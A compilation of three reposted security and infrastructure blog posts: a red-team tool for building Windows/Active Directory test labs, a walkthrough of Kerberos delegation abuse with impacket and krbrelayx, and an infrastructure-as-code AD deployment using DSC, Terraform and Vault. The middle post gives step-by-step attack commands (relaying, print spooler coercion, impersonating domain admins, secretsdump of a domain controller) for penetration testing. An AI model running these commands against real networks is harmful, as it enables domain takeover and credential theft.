Automated AD and Windows test lab deployments with Invoke-ADLabDeployer

Original text by Marc Smeets

We are happy to introduce Invoke-ADLabDeployment: a PowerShell project that helps you to quickly deploy a virtual test environment with Windows servers, Windows desktops, Office, Active Directory and a networking setup with multiple broadcast segments, all running on your local Hyper-V environment.

It is an in-house developed tool that we use heavily during our red teaming engagements. We use this to quickly spin-up lab environments that resemble the target environment. This way we can better develop and test our attacks, as well as investigate what artefacts we might leave behind.

We feel it is time to give back to the community and allow other red and blue teams to benefit from this. You can read more about its functionality and why we developed this below. Or you can go straight to the code and manual on our github.

Background and goal

During our red teaming engagements, we encounter many different setups. To test our attacks and to know what trails we leave behind, we need to test in setups that mimic the client’s environment as much as possible. But we never know what exact environment we will encounter. It could be all Win10 desktops with Office 2016 and 2016 servers, it could be Win7 with Office 2010 and 2008R2 servers, or it could be any combination of those. Also, x86 vs x64 can make a big difference for our payloads.

We prefer more time for hacking and less time for deploying test labs. The old method of manually cloning prepared virtual machines, manually go through the networking and AD setup, manually install Office and other client-side tools….sigh…its time consuming and error prone. And if you become sloppy by using older test machines, you might expose yourself with poor OPSEC.

This is where Invoke-ADLabDeployer comes in. It does the heavy lifting for you. In a matter of minutes, you have a freshly deployed lab with multiple Windows systems, ranging from Win7 to Win10, Server 2008R2 to 2016, all domain joined, with Office version 2010, 2013 or 2016 installed, alongside other client-side tools you want installed, as well as a networking setup with multiple broadcast segments. Its not a fixed test lab; you define the exact lab setup in a config file.

Differences with other tooling

There are other projects out there that do somewhat similar things. We reviewed those with our specific demands in mind. We need something that:

  • Allows us to mimic the client’s environment as much as possible.
  • Is relative lightweight in code base and we can easily add functionality to if required.
  • Has support for all Windows OS versions currently encountered at clients, specifically support for as old as Windows 7 and Server 2008R2.
  • Can deploy Active Directory, and have systems join it.
  • Can install Office 2010, 2013 and 2016.
  • Can install other client-side software.
  • Can deploy multiple subnets so we can test network level attacks while not putting everything in the same broadcast segment (keeping it like real target networks).
  • Keeps resource usage low.
  • Is able to deploy large number of systems, e.g. from 1 to 25.
  • Is cost efficient.

We searched for other solutions. But we found none that fitted our exact requirements. There are a few other PowerShell projects for test lab deployment like AutomatedLab, ws2016Lab, and Lability. And they are awesome for things that they are developed for. But for our goal they either have a lot of dependencies, huge code bases, don’t have support for as low as Win7 and 2008R2, or require all labs to be deployed via DSC, which doesn’t provide the flexibility we want.

There are Configuration Management tools like Ansible and Puppet, but they don’t deploy operating systems and networks or they do in an unfriendly way. There are Image Deployment tools like WIM and PXE boot, but they are lacking options for dynamic post deployment configuration. We could do snap shots of virtual machines. But this requires many manual steps, which is time consuming and error prone.

Of course there is also cloud computing, which some think would be excellent for this usage. Well, we think the downsides are too big. We could only find Azure and AWS that do any mature form of Windows deployments. But they don’t really do client Windows versions (Azure can do with expensive subscription), don’t really allow you to decide the exact patch level of your systems, do very icky things on the network level (multicast and broadcast are non-existing in the cloud) and it can become very(!) expensive if you deploy a larger network.

So, whatever solution we chose, we would still need to either script on the base OS deployment phase, or script on the post deployment phase. We could combine solutions. But after a quick try we gave up crying as the number of extra tools required and overall overhead was just insane.

It seemed we needed to develop something easy and lightweight ourselves. And when you think of it, its not that hard to do what we want to do. Especially when you are using modern Hyper-V with its many smart tricks applied to keep resource usage low, like differencing disks and dynamic memory.

Technical requirements

Invoke-ADLabDeployer relies heavily on Hyper-V, sysprep and (remote) Powershell for the deployment and configuration. It runs on a local Windows host with Hyper-V. In our lab we are using an Intel Skull NUC with maximum RAM running Server 2016. It does the job perfectly for our usage.

You may try running it on older Windows version. Just make sure to install WMF5 or later on your host node. For the guests you don’t need PowerShell 5: an important design decision for us was to support  as low as PowerShell version 2 for the deployed machines. This in theory would make it also able to deploy 2003 and XP machines. We have not tested this yet.

Base image preparation and usage

Before you can deploy your first network, you need to have base images prepared. The script does not do this for you. Some other tools do this for you, and I may include this in future versions. But at this moment you need to create the base images yourself.

This base image preparation means you create a new virtual machine, install the Windows version you want on it, update to the level you want, enable remote powershell, do other customisation you want all your future deployment to have, and you power it off using a sysprep command. You do this for every base OS you want in your library. This task might take you a few evenings to complete, of which the installation of Windows updates takes the most time. But as I’ve included the correct unattend.xml files in the repository, you can skip at least the endless hours of debugging sysprep 🙂 Check the readme on our github for a detailed walkthrough of this very important preparation.

Running Invoke-ADLabDeployer

When the base image preparation is done, all you need to do is:

  • Define the lab in a XML config file
  • Import and run Invoke-ADLabDeployer
  • Wait a few minutes

The XML config file defines the details of the networks, the systems and the setup of Active Directory domain. The settings for the network and ADDS are pretty straight forward.

Invoke-ADLabDeployer config of network and AD

In the config file you also define what systems you deploy, and how they are configured. Here is an example of 2 systems: “server1” is an 20012R2 machine that will be running the Domain Controller (as defined in the ADDS section), and “server2” is a non-domain joined system. Both install Chrome, 7zip and Notepad++, but server2 also wil have a file copied (the installer of Microsoft ATA).

Config of 2 servers: ‘server1’ and ‘server2’

There are many more options you can use in the XML config file to automate the tuning of systems. Yo can find all options on github. But I would like to point out 2 more to give you an idea: <SkipDeploy> and the installation of Office.

<SkipDeploy> is a tag that you can insert per system allowing you to keep the system config in the file, but not have it deployed. This makes it easier to use the same config when you only want to deploy a subset of systems.

The automated installation of Microsoft Office is done using the <OfficeInstaller> and the <OfficeConfig> tag. OfficeInstaller points to the actual installer EXE copied from the contents of the Office ISO. The OfficeConfig point to the config file required for automated Office installs. I’ve included these Office config files in the repository.

Config options SkipDeploy and for the installation of Office

You can test the config file by running with the -CheckConfigOnly parameter. It either tells you the errors in your config, or it will present you with an output similar like this.

Checking the config

You can catch the output in hashtables and go through all the details of the config if you want.

Checking the config with local hashtables

When running the script you will get an output similar like the following screenshots. First it will read the config and create the networks and systems.

Read config, create network and systems, and boot

Then it will install the Active Directory domain controller, check if its successful and have clients join the domain.

Domain actions

Finally it will iterate through all the systems and perform software installation (including Office) and final tuning based on smart things and config file parameters.

Software installation and final configuration

The total deployment speed is heavily depending on your hardware specs. But on our hardware a single system is deployed in a few minutes, while a 10-host network, with AD, and all hosts with Office and other tools installed, can take up to 40 minutes. Currently the code does not do any parallelisation. I might implement this in the future. But to be honest the deployment time is of lesser concern for us.

You can find the code on the project’s github. You can expect more updates in the near future. I very much welcome your code submissions. Or you can let me know your ideas via Twitter.

Thanks to University of Amsterdam students Fons Mijnen and Vincent van Dongen for following up on our initial idea with their research and PoC.

No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

Original text by Red XOR Blue

There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.  However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.  While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.  To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools.
This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed walkthroughs of how to perform them on a Linux platform.  What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth, as there are some really great articles already out that go into a ton of detail on the inner-workings of the protocol.  If you are interested in a deeper dive, the most comprehensive & enlightening post I’ve read is @Elad_Shamir’s write-up: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

Unconstrained Delegation


What Is It?

Back in the early days of Windows Active Directory (pre-Server 2003) this was really the only way to delegate access, which at a high level effectively means configuring a service with privileges to impersonate users elsewhere on the network.  Unconstrained Delegation would be used for something like a front-end web server that needed to take in requests from users, and then impersonate those users to access their data on a second database server.  

Unfortunately, as the name implies, these impersonation rights were not limited to a single system or service, but rather allowed a configured account to impersonate anyone that authenticated against it anywhere on the network.  This is due to the fact that when an object authenticates to a service tied to an account configured with unconstrained delegation, they send the remote service a copy of their TGT (Ticket Granting Ticket), which allows the remote system to generate new TGS (Ticket Granting Service / service ticket) requests at-will.  These TGS’ are used for authenticating to Kerberos-enabled services across the network, meaning that if you possess an object’s TGT you can impersonate them anywhere on the network where you can authenticate with Kerberos.

When To Use:

If you can gain access to an account (user or computer) that is configured with unconstrained delegation.  To identify users & computers configured with unconstrained delegation I use pywerview, a python port of a good chunk of powerview’s functionality (https://github.com/the-useless-one/pywerview) but feel free to use whatever tools works best for you. This tool has handy flags to pull both accounts configured with both constrained + unconstrained delegation.  In this case what we’re really looking for is any user or computer with a UserAccountControl attribute that includes ‘TRUSTED_FOR_DELEGATION’.  All we’ll need at this point is a set of creds for AD to allow us to do the enumeration.  Taking a look at the output of the check we ran below, we can see that the user ‘unconstrained’ is configured with unconstrained delegation:

If you have find you have access to a computer object that is configured with unconstrained delegation, it may be easier simply to perform the print spooler attack and extract the ticket from memory using Rubeus, as detailed here: https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1.  However, if you have access to a user account configured with delegation or would prefer to avoid running code on remote systems as much as possible, the following should be helpful.

Process Walkthrough:

Note: This section is pretty much a direct walkthrough of the awesome work @_dirkjan wrote up in his blog here: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ If you’re familiar with this style of attack it’s nothing new, just a (hopefully) fairly straightforward walkthrough of the path that I’ve had the most success with on engagements after identifying unconstrained delegation.
If we do end up identifying any user accounts configured with unconstrained delegation, we’ll want to obtain Kerberos tickets we can attempt to crack.  For an account to be configured with delegation, they also need to be configured with an SPN (Service Principal Name).  This means that we should be able to retrieve a crackable Kerberos ticket for the account using GetUserSPNs.py

GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user UNCONSTRAINED_USER

Assuming we’re able to recover the password for an account / used another method to get admin access on a computer configured with unconstrained delegation, we can now move on to attempting to leverage this access to get DA on the network.  We’ll start by attempting to add an SPN to the account we have access to. This is the only part of the attack that will require non-default settings to be configured (for a user account), but per all the sql devs on stack exchange asking how to enable it, it seems to be something that should be commonly turned on already.  If we have access to a computer account configured with unconstrained delegation, we can use the ‘Validated write to DNS host name’ security attribute (configured by default) to add an additional hostname to the object, which will automatically configure new SPN’s that will also be configured with unconstrained delegation. We then just have to create a new DNS record to point that new hostname to us.
We’ll be using dirk-jan’s krbrelayX toolkit for the rest of this process (https://github.com/dirkjanm/krbrelayx), first using addspn.py to attempt to add a ‘host’ spn for a nonexistent system on the network.  Note – it is important to ensure when you’re adding an SPN you use the fqdn of the network, not just the hostname.  You’ll see one of two messages, based on if your account has privileges to modify its own SPN’s (above = an account with appropriate attributes set, below = attribute not set).

addspn.py -u DOMAIN\\USER -p PASSWORD -s host/FAKESYSTEM.FQDN ldap://DC.FQDN

If you don’t have privileges, this is pretty much the end of this potential vector, although I would still recommend targeting the systems(s) on which the account has SPN’s configured for, as they likely have TGT’s in-memory.
However, if we are able to successfully add an SPN for a non-existent system we can keep going.  Next, we’ll want to add a DNS record for this same non-existent system that links back to our system’s IP, effectively turning our system into this non-existent system.  Due to the actions we took in the last step (creating an SPN for the ‘host’ service with our user configured with unconstrained delegation on this non-existent hostname that now points to our system), we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on the ‘host’ service on it. 
We’ll be using another part of the krbrelayx toolkit, dnstool.py, to complete this step to create a new DNS record and then point it at the IP of our attack box (Note: dns records take ~3 minutes to update, so don’t worry if you complete this step and cant immediately ping / nslookup your new host):

dnstool.py -u DOMAIN\\USERNAME -p PASSWORD -r FAKESYSTEM.FQDN -a add -d YOUR_IP DC_HOSTNAME

Everything should be ready to go now, we’ll execute the print spooler bug to force the DC$ account to attempt to authenticate to the host service of our new ‘computer’ that is configured with unconstrained delegation.  This will in turn cause the DC to provide a copy of its TGT when authenticating, which we can then use to impersonate it on any other Kerberos-enabled service.  In one window we’ll set up krbrelayx.py as follows: **This is very important**  the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive).  The Krbpass is the user’s password, nothing crazy there.

krbrelayx.py --krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD

Once you have that running in one window, we’ll use the final tool within the krbrelayx toolkit to kick off the attack (Note: The user used to kick off the attack doesn’t matter, it can be any domain user).  The below shows what the successful attack looks like:

printerbug.py DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN

On our krbrelayx window, we should see that we have gotten an inbound connection, and have obtained a tgt (formatted as .ccache) file for the DC$ account:

At this point, we just need to export the ticket we received into memory, after which we should be able to run secretsdump against the DC:

export KRB5CCNAME=CCACHE_FILE.CCACHE

secretsdump.py -k DC_Hostname -just-dc





Constrained Delegation


What Is It?

Microsoft’s next iteration of delegation included the ability to limit where objects had delegation (impersonation) rights to.  Now a front-end web server that needed to impersonate users to access their data on a database could be restricted; allowing it to only impersonate users on a specific service & system.  However, as we will find out, the portion of the ticket that limits access to a certain service is not encrypted.  This gives us some room to gain additional access to systems if we gain access to an object configured with these rights.

When To Use:

If you can gain access to an account (user or computer) that is configured with constrained delegation.  You can find this by searching for the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ value in the UserAccountControl attribute of AD objects.  This can be also be found through the use of Pywerview, as outlined in the above section.

Process Walkthrough:

This time, we’ll start by targeting another account, httpDelegUser.  As we can see from our initial enumeration with Pywerview, this account has the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ flag set.  We can also check the contents of the account’s msDS-AllowedToDelegateTo attribute to determine that it has delegation privileges to the www service on Server02.  Not the worst thing in the world, but probably not going to get us a remote shell.

Also a quick recap of the account’s group memberships:

To start this attack, we’ll use another impacket tool – getST.py – to retrieve a ticket for an impersonated user to the service we have delegation rights to (the www service on server02 in this case).  In this example we’ll impersonate ‘bob’, a domain admin in this environment.  Note: If a user is marked as ‘Account is sensitive and cannot be delegated’ in AD, you will not be able to impersonate them.

getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

From here, the initial assumption would be that we could only authenticate against the www service on server02 with this ticket.  However, Alberto Solino discovered that the service name portion of the ticket (sname) is not actually a protected part of the ticket.  This allows us to change the sname to any value we want, as long as its another service running under the same account as the original one we have delegation rights to.  For example, if our account (httpDelegUser) has delegation rights to a service that the server02 computer object is running (example SPN: www/server02), we can change our sname to any other SPN associated with server02 (ex. cifs/server02).  His blog on the mechanism by which this occurs is super insightful, and worth a read:  https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
Even better for us, as Alberto Solino is one of the primary writers of impacket, he built this logic in so that these sname conversions happen automatically for us on the back-end:

From an operational standpoint, what this means is that the ticket for the www service we obtained in the step above can be loaded into memory and used to use just about any of the impacket suite of tools to run commands, dump SAM, etc.



Resource-Based Constrained Delegation


What Is It?

Note: Microsoft is releasing an update in January 2020 that will enable LDAP channel binding & LDAP signing by default on Windows systems, remediating this potential attack vector on fully patched systems. 

Starting with Windows Server 2012, objects in AD could set their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, effectively allowing objects to set what remote objects had rights to delegate to them.  This allows those remote objects with delegation rights to impersonate any account in AD to any service on the local system.  Therefore, if we can convince a remote system to add an object that we control to their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we can use it to impersonate any other user not marked as ‘Account is sensitive and cannot be delegated’ on it.

When To Use:

Basically, when you’re on a network and want to get a shell on a different system on that same network segment.  This attack can be ran without needing any prior credentials, as described by @_dirkjan in his blog here: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ .  However, the method described does require that a domain controller in the environment is configured with LDAPS; which seems to be somewhat uncommon based on the environments I’ve tested against over the past 6 months.           

I’ll focus on a secondary scenario for this attack – one where you have compromised a standard low-privilege user account (no admin rights) or a computer account, and are on a network segment with other systems you want to compromise.

Process Walkthrough:

To begin with, what this attack really needs is *some* sort of account that is configured with an SPN.  This can be a computer account, a user account that is already configured with an SPN, or can be a computer account we create using a non-privileged user account by taking advantage of a default MachineAccountQuota configuration (https://blog.netspi.com/machineaccountquota-is-useful-sometimes/).  We need an account that is configured with an SPN as this is a requirement if we want the TGS produced by S4U2Self to be forward-able (Read more why this is necessary here: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#a-misunderstood-feature-1).  Computer accounts work as by default they are configured with a variety of SPN’s for all their various Kerberos-enabled services.
So, in our example let’s say we only have a low privilege account (we’ll use the ‘tim’ account). 

The first step in the process would be to try and create a computer account, so that we could gain control of an account configured with SPN’s.  To do this, we’ll use a relatively new impacket example script – addcomputer.py.  This script has a SAMR option to add a new computer, which functions over SMB and uses the same mechanism as when a new computer is added to a domain using the Windows GUI.

addcomputer.py -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD

After running this command, your new computer object will be added to AD (Note: this example script was not fully working for me in python2.7 – the computer object was added but its password was not being appropriately set.  It does work using Python3.6 though.)

This script was released fairly recently, prior to it I used PowerMad.ps1 from a Windows VM to perform the same actions.  This tool uses a standard LDAP connection vs. SAMR, but the end result is the same.  For further info on PowerMad I recommend the following: https://github.com/Kevin-Robertson/Powermad
If this part of the attack didn’t work, the default MachineAccountQuota has likely been changed for users in the environment.  In that case you’ll need to use alternative methods to obtain a computer account / user account configured with an SPN.  However, once you have that, you can continue to proceed as described below.
For the next part of the attack we’ll be using mitm6 + ntlmrelayx.  Unlike a traditional NTLM relay attack, really what we’re interested in is intercepting machine account hashes, as we can forward them to LDAP on a domain controller.  This allows us to impersonate the relayed computer account and set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to include the computer object that we control.  Note: We unfortunately can’t relay SMB to LDAP due to the NTLMSSP_NEGOTIATE_SIGN flag set on SMB traffic, so will be focusing on intercepting HTTP traffic, such as windows update requests. 
We’ll first set up ntlmrelayx to delegate access to the computer account we just made & have control of (rbcdTest): 

ntlmrelayx.py -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DOMAIN_CONTROLLER

We next start a relay attack using mitm6.py or other relay tool, and wait for requests to start coming in.  Eventually you should see something that looks like the following:

In the above screenshot we can see that we successfully relayed the incoming auth request made by the server02$ account to LDAP on the domain controller and modified the object’s privileges to give rbcdTest$ impersonation rights on the system.
Once we have delegation rights, the rest of the attack is fairly straightforward.  We’ll use another impacket tool – getST.py – to create the TGS necessary to connect to Server02 using an impersonated identity.
This tool will get us a Kerberos service ticket (TGS) that is valid for a selected service on the remote system we relayed to LDAP (Server02).  As the rbcdTest$ account has delegation rights on this system, we are able to impersonate any user that we want, in this case choosing to impersonate ‘administrator’, a domain admin on the testlab.local network.

getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

With the valid ticket saved to disk, all we need to do is export it to memory, which will then allow us to remotely connect to the remote system with administrative privileges:

Active Directory as Code

( Original text by Palantir )

Windows Automation used to be hard, or at least not straightforward, manifesting itself in right-click-to-glory deployments where API-based management was a second thought. But the times, they are a-changin’! With the rise of DevOps, the release of Windows Server 2016, and the growth of the PowerShell ecosystemopportunities to redesign traditional Windows infrastructure have opened up.

One of the more prevalent Windows-based systems is Active Directory (AD) — a cornerstone in most enterprise environments which, for many, has remained an on-premise installation. At Palantir, we ❤️ Infrastructure as Code (see Terraforming Stackoverflow and Bouncer), so when we were tasked with deploying an isolated, highly available, and secure AD infrastructure in AWS, we started to explore ways we can apply Infrastructure as Code (IaC) practices to AD. The goal was to make AD deployments automated, repeatable, and configured by code. Additionally, we wanted any updates tied to patch and configuration management integrated with our CI/CD pipeline.

This post walks through the approach we took to solve the problem by outlining the deployment process including building AD AMIs using Packer, configuring the AD infrastructure using Terraform, and storing configuration secrets in Vault.

Packerizing Active Directory

Our approach to Infrastructure as Code involves managing configuration by updating and deploying layered, immutable images. In our experience, this reduces entropy, codifies configuration, and is more aligned with CI/CD workflows which allows for faster iteration.

Our AD image is a downstream layer on top of our standard Windows image built using a custom pipeline using Packer, Jenkins and AWS CodeBuild. The base image includes custom Desired State Configuration (DSC) modules which manage various components of Windows, Auto Scaling Group (ASG) lifecycle hooks, and most importantly, security tooling. By performing this configuration through the base image, we can enforce security and best practices regardless of how the image is consumed.

Creating a standardized AD image

The AD image can be broken down into the logical components of an instance lifecycle: initial image creation, instance bootstrapping, and decommissioning.

Image creation

It is usually best practice to front-load as much of the logic during the initial build since this process only happens once whereas bootstrapping will run for each instance. This is less relevant when it comes to AD images which tend be lightweight with minimal package dependencies.

Desired State Configuration (DSC) modules

AD configuration has traditionally been a very GUI-driven workflow that has been quite difficult to automate. In recent years, PowerShell has become a robust option for increasing engineer productivity, but managing configuration drift has always been a challenge. Cue DSC modules ????

DSC modules are a great way to configure and keep configured the Windows environment with minimal user interaction. DSC configuration is run at regular intervals on the host and can be used to not only report drift, but to reinforce the desired state (similar to third-party configuration tools). 

One of these modules is the Microsoft AD DSC module. To illustrate how DSC can be a force multiplier, here is a quick example of a group creation invocation. This might seem heavy-handed for a single group, but the real benefit is when you are able to iterate over a list of groups such as below for the same amount of effort. The initial content of Groups can be specified in a Packer build (static CSV) or generated dynamically from an external look-up.

Sample DSC configuration

<#
.SYNOPSIS
Example demonstrating ingesting a list of N AD groups
and creating their respective resources using a single code
block
        The AD groups can be baked in the AMI or retrieved from an
external source
#>

$ConfigData = @{
AllNodes = @(
@{
NodeName = '*'
Groups = (Get-Content "C:\dsc\groups.csv")
}
)
}

Configuration NodeConfiguration
{
Import-DSCResource -ModuleName xActiveDirectory

Node $AllNodes.NodeName {
foreach ($group in $node.Groups) {
xADGroup $group
{
GroupName = $group
Ensure = "Present"
# additional params
}
}
}
}

NodeConfiguration -ConfigurationData $ConfigData

We have taken this one step further by building additional modules to stand up a cluster from scratch. These modules handle everything from configuring core Windows features to deploying a new domain controller. By implementing these tasks as modules, we get the inherent DSC benefits for free, for instance reboot resilience and mitigation of configuration drift.

Bootstrap scripts

Secrets. A problem like handling configuration secrets like static credentials warrants additional consideration when it comes to a sensitive environment such as AD. Storing encrypted secrets on disk, manually entering them at bootstrap time, or a combination of the two are all sub-optimal solutions. We were looking for a solution that will:

  • Be API-driven so that we can plug it in to our automation
  • Address the secure introduction problem so that only trusted instances are able to gain access
  • Enforce role-based access control to ensure separation between the Administrators (who create the secrets) and instances (that consume the secrets)
  • Enforce a configurable access window during which the instances are able to access the required secrets

Based on the above criteria, we have settled on using Vault to store our secrets for most of our automated processes. We have furthered enhanced it by creating an ecosystem which automates the management of roles and policies, allowing us to grow at scale while minimizing administrative overhead. This allows us to easily permission secrets and control what has access to them and how long by integrating Vault with AWS’ IAM service. This along with proper auditing and controls gives us the best of both worlds: automation and secure secrets management.

Below is an example of how an EC2 instance might retrieve a token from a Vault cluster and use that token to retrieve secrets:

Configuring the instance. AWS ASGs automatically execute the user data (usually a PowerShell script) that is specified in their launch configuration. We also have the option to dynamically pass variables into the script to configure the instance at launch time. As an example, here we are setting the short and full domain names and specifying the Vault endpoint by passing them as arguments for bootstrap.ps1:

Terraform invocation

data "template_file" "userdata" {
template = "${file("${path.module}/bootstrap/bootstrap.ps1")}"

vars {
domain = "${var.domain_name}"
shortname = "${var.domain_short_name}"
vaultaddress = "${var.vault_addr}"
}
}
resource "aws_auto_scaling_group" "my_asg" {
# ...
user_data = "${data.template_file.userdata.rendered}"
}

Bootstrap script (bootstrap.ps1)

<powershell>
Write-Host "My domain name is ${domain} (${shortname})"
Write-Host "I get secrets from ${vaultaddress}"
# ... continue configuration
</powershell>

In addition to ensuring that the logic is correct for configuring your instance, something else that is as equally important is validation to reduce false positives when putting an instance in service. AWS provides a tool for doing this called lifecycle hooks. Since lifecycle hook completions are called manually in a bootstrap script, the script can contain additional logic for validating settings and services before declaring the instance in-service.

Instance clean-up

The final part of the lifecycle that needs to be addressed is instance decommissioning. Launching instances in the cloud gives us tremendous flexibility, but we also need to be prepared for the inevitable failure of a node or user-initiated replacement. When this happens, we attempt to terminate the instance as gracefully as possible. For example, we may need to transfer the Flexible Single-Master Operation (FSMO) role and clean up DNS entries.

We chose to implement lifecycle hooks using a simple scheduled task to check the instance’s state in the ASG. When the state has been set to Terminating:Wait, we run the cleanup logic and complete the terminate hook explicitly. We know that lifecycle hooks are not guaranteed to complete or fire (e.g., when instances experience hardware failure) so if consistency is a requirement for you, you should look into implementing an external cleanup service or additional logic within bootstrapping.

Putting it all together: Terraforming Active Directory

Bootstrapping infrastructure

With our Packer configuration now complete, it is time to use Terraform to configure our AD infrastructure and deploy AMIs. We implemented this by creating and invoking a Terraform module that automagically bootstraps our new forest. Bootstrapping a new forest involves deploying a primary Domain Controller (DC) to serve as the FSMO role holder, and then updating the VPC’s DHCP Options Set so that instances can resolve AD DNS. 

The design pattern that we chose to automate the bootstrapping of the AD forest was to divide the process into two distinct states and switch between them by simply updating the required variables (lifecycle, configure_dhcp_os) in our Terraform module and applying it.

Let us take a look at the module invocation in the two states starting with the Bootstrap State where we deploy our primary DC to the VPC:

# Bootstrap Forest
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = ["15.0.0.0/8"]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = "https://vault.secret.place"
    need_fsmo   = "true"
    # Add me for step 1 and swap me out for step 2
lifecycle = "bootstrap"

# Set me to true when lifecyle = "steady"
configure_dhcp_os = "false"
}

Once the Bootstrap State is complete, we switch to the Steady State where we deploy our second DC and update the DHCP Options Set. The module invocation is exactly the same except for the changes made to the lifecycleand configure_dhcp_os variables:

# Apply Steady State
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = ["15.0.0.0/8"]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = "https://vault.secret.place"
    need_fsmo   = "true"

# Add me for step 1 and swap me out for step 2
lifecycle = "steady"
    # Set me to true when lifecyle = "steady"
configure_dhcp_os = "true"
}

Using this design pattern, we were able to automate the entire deployment process and manually transition between the two states as needed. Relevant resources are conditionally provisioned during the two states by making use of the count primitive and interpolation functions in Terraform.

Managing steady state

Once our AD infrastructure is in a Steady state, we update the configuration and apply patches by replacing our instances with updated AMIs using Bouncer. We run Bouncer in serial mode to gracefully decommission a DC and replace it by bringing up a DC with a new image as outlined in the “Instance Clean Up” section above. Once the first DC has been replaced, Bouncer will proceed to cycle the next DC.

Conclusion

Using the above approach we were able to create an isolated, highly-available AD environment and manage it entirely using code. It made the secure thing to do the easy thing to do because we are able to use Git-based workflows, with 2-FA, to gate and approve changes as all of the configuration exists in source control. Furthermore, we have found that this approach of tying our patch management process to our CI/CD pipeline has led to much faster patch compliance due to reduced friction.

In addition to the security wins, we have also improved the operational experience by mitigating configuration drift and being able to rely on code as a source for documentation. It also helps that our disaster recovery strategy for this forest amounts to redeploying the code in a different region. Additionally, benefits like change tracking and peer reviews that have normally been reserved for software development are now also applied to our AD ops processes.